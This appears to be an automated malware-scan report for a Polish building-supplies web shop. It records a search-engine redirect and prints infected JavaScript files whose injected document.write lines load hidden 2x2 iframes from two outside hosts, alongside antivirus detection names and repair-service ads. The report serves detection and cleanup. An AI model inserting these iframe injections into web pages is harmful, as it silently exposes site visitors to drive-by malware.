New scan:

Malware Scanner report for sklep-budowlany.com

Malicious/Suspicious/Total urls checked
7/0/15
7 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://tomurcukozel.com/ecws.html?h=1060071
8 websites infected.

The website "sklep-budowlany.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/21/21
21 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://sklep-budowlany.com/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: sklep-budowlany.com
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Mon, 22 Sep 2014 15:12:24 GMT
Location: http://tomurcukozel.com/ecws.html?h=1060071
Server: Apache/2
Content-Length: 227
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

RequestServer responseStatus
http://sklep-budowlany.com/
200 OK
Content-Length: 18193
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://tomurcukozel.com/ecws.html?i=1060071

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071>

http://sklep-budowlany.com/js/skrypty.js
200 OK
Content-Length: 2201
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function newwin(x,y,win)
{ window.open("",""+win+"","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,width="+x+",height="+y+""); }
function poptastic(url,x,y)
{
newwindow=window.open(url,'name','height='+y+',width='+x+',toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no');
if (window.focus) {newwindow.focus()}
}

function close_tab() {
var oElement = document.getElementById('m
... 1507 bytes are skipped ...
w.macromedia.com/go/getflashplayer&quot;&gt;&lt;/EMBED&gt;&lt;/OBJECT&gt;";
window.clipboardData.setData("Text", b)
}
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071></iframe>');

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://tomurcukozel.com/ecws.html?i=1060071

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071>

Hidden iFrame found.
size: 2x2     
src: http://cpaexamreviewcourses.net/zahs.html

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html>

http://sklep-budowlany.com/js/dtree.js
200 OK
Content-Length: 13072
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)






function Node(id, pid, name, url, title, target, icon, iconOpen, open) {

this.id = id;

this.pid = pid;

this.name = name;

this.url = url;

this.title = title;

this.target = target;

this.icon = icon;

this.iconOpen = iconOpen;

this._io = open || false;

this._is = false;

this._ls = false;

this._hc = false;

this._ai =
... 4071 bytes are skipped ...
> lastElement = this[this.length-1];

this.length = Math.max(this.length-1,0);

return lastElement;

}

};
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071></iframe>');

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://cpaexamreviewcourses.net/zahs.html

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html>

Hidden iFrame found.
size: 2x2     
src: http://tomurcukozel.com/ecws.html?i=1060071

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071>

http://sklep-budowlany.com/js/ajax.js
200 OK
Content-Length: 5319
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)






function sack(file) {
this.xmlhttp = null;

this.resetData = function() {
this.method = "POST";
this.queryStringSeparator = "?";
this.argumentSeparator = "&";
this.URLString = "";
this.encodeURIString = true;
this.execute = false;
this.element = null;
this.elementObj = null;
this.requestFile = file;
this.vars = new Object();
this.responseStatus = new Array(2);
... 3623 bytes are skipped ...
"200") {
self.onCompletion();
} else {
self.onError();
}

self.URLString = "";
break;
}
};

this.xmlhttp.send(this.URLString);
}
}
};

this.reset();
this.createAJAX();
}
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071></iframe>');

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://tomurcukozel.com/ecws.html?i=1060071

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071>

http://sklep-budowlany.com/js/ajax-dynamic-list.js
200 OK
Content-Length: 314
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071></iframe>');

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://tomurcukozel.com/ecws.html?i=1060071

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071>

Hidden iFrame found.
size: 2x2     
src: http://cpaexamreviewcourses.net/zahs.html

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html>

http://sklep-budowlany.com/js/prototype.js
200 OK
Content-Length: 47919
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var Prototype = {
Version: '1.4.0',
ScriptFragment: '(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)',
emptyFunction: function() {},
K: function(x) {return x}
}
var Class = {
create: function() {
return function() {
this.initialize.apply(this, arguments);
}
}
}
var Abstract = new Object();
Object.extend = function(destination, source) {
for (property in source) {
destination[property] = source[
... 3503 bytes are skipped ...
t, 'position') == 'absolute') break;
element = element.offsetParent;
} while (element);
return [valueL, valueT];
}
}
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071></iframe>');

Antivirus reports:

Avast
JS:Iframe-AMJ [Trj]
TrendMicro-HouseCall
TROJ_GEN.F47V0321
Norman
Iframe.UW
GData
JS:Iframe-AMJ

Hidden iFrame found.
size: 2x2     
src: http://cpaexamreviewcourses.net/zahs.html

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html>

Hidden iFrame found.
size: 2x2     
src: http://tomurcukozel.com/ecws.html?i=1060071

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071>

http://sklep-budowlany.com/js/scriptaculous.js?load=effects
200 OK
Content-Length: 2468
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var Scriptaculous = {
Version: '1.5.1',
require: function(libraryName) {
document.write('<script type="text/javascript" src="'+libraryName+'"></script>');
},
load: function() {
if((typeof Prototype=='undefined') ||
parseFloat(Prototype.Version.split(".")[0] + "." +
Prototype.Version.split(".")[1]) < 1.4)
throw("script.aculo.us requires the Prototype JavaScript framework >= 1.4.0");

... 381 bytes are skipped ...
ider').split(',').each(
function(include) { Scriptaculous.require(path+include+'.js') });
});
}
}
Scriptaculous.load();
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071></iframe>');

Antivirus reports:

AntiVir
JS/iFrame.SC
Avast
JS:Iframe-AEL [Trj]
Comodo
TrojWare.JS.Iframe.CY
Kaspersky
HEUR:Trojan.Script.Generic
F-Prot
IFrame.gen
Norman
Iframe.RZ
GData
JS:Iframe-AEL
Commtouch
IFrame.gen

Hidden iFrame found.
size: 2x2     
src: http://tomurcukozel.com/ecws.html?i=1060071

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071>

Hidden iFrame found.
size: 2x2     
src: http://cpaexamreviewcourses.net/zahs.html

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html>

http://sklep-budowlany.com/js/lightbox.js
200 OK
Content-Length: 314
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071></iframe>');

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://tomurcukozel.com/ecws.html?i=1060071

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071>

Hidden iFrame found.
size: 2x2     
src: http://cpaexamreviewcourses.net/zahs.html

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html>

http://sklep-budowlany.com/?go=kategorie
200 OK
Content-Length: 26258
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://tomurcukozel.com/ecws.html?i=1060071

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071>

http://sklep-budowlany.com/?category_id=698
200 OK
Content-Length: 36776
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://tomurcukozel.com/ecws.html?i=1060071

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071>

http://sklep-budowlany.com/?category_id=704&supplier=
200 OK
Content-Length: 19666
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://tomurcukozel.com/ecws.html?i=1060071

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071>

http://sklep-budowlany.com/?category_id=716
200 OK
Content-Length: 26054
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://tomurcukozel.com/ecws.html?i=1060071

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071>

http://sklep-budowlany.com/?category_id=723&supplier=Kopalnia Julian
200 OK
Content-Length: 14204
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://tomurcukozel.com/ecws.html?i=1060071

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071>

http://sklep-budowlany.com/?category_id=512
200 OK
Content-Length: 37472
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://tomurcukozel.com/ecws.html?i=1060071

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071>

http://sklep-budowlany.com/?category_id=558&supplier=Cieszynka
200 OK
Content-Length: 15743
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://tomurcukozel.com/ecws.html?i=1060071

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071>

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=sklep-budowlany.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://sklep-budowlany.com/

Result: sklep-budowlany.com is not infected or malware details are not published yet.